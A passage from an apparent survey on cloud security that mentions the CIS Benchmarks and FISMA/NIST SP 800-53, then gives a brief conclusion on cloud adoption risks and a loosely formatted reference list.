rigorously reviewed by a number of professionals before it is agreed.
For a ready-made list of checks for cloud security, consult the CIS Benchmarks customized
for particular cloud service providers. For instance, the CIS Amazon Web Services
Foundations Benchmark is a set of checks created especially for workloads on Amazon Web
Services (AWS).

4. FISMA

Under the Federal Information Security Management Act (FISMA), all US federal agencies
and their contractors are required to safeguard their information systems and assets.
FISMA gave NIST the authority to define the framework's security standards, which it does
in NIST SP 800-53.

10. Conclusion
Every new technology has its pros and cons, and cloud computing is no exception. It
provides the benefits of quick deployment, cost efficiency, large storage space and easy
access to the system anytime and anywhere, and it has clearly become a rapidly emerging
and widely accepted computing environment around the world. However, many security
and privacy concerns are obstacles to its adoption. All cloud users should be aware of the
vulnerabilities, threats and attacks that exist in the cloud. Awareness of these threats and
attacks will help organizations adopt the cloud quickly without exposing themselves.

References
1. A. Singh, K. Chatterjee, "Cloud security issues and challenges: A survey", Journal of Network and Computer Applications, vol. 79, 1 February 2017, pp. 88-115.
2. J. Surbiryala, C. Rong, "Cloud Computing: History and Overview", IEEE, Department of Electrical Engineering and Computer Science, University of Stavanger, Stavanger, Norway.
3. [8] Microsoft, "Windows Azure", http://www.microsoft.com/azure. [Online; accessed 31-Jan-2019].
4. [9] Google, "Google App Engine", http://code.google.com/appengine. [Online; accessed 31-Jan-2019].
5. [10] Amazon, "Amazon Elastic Compute Cloud", http://aws.amazon.com/ec2. [Online; accessed 31-Jan-2019].
6. [20] Amazon, "Amazon Web Services", http://s3.amazonaws.com. [Online; accessed 31-Jan-2019].
7. [21] Dropbox Inc., "Dropbox", http://www.dropbox.com. [Online; accessed 31-Jan-2019].
8. [22] Microsoft, "Office 365: Documents and Outlook". [Online; accessed 31-Jan-2019].
9. Asian Journal of Advances in Research, "Data Security in Cloud: A Review".
10. Cloud Security For Dummies.
11. GeeksforGeeks, "Cloud Computing".

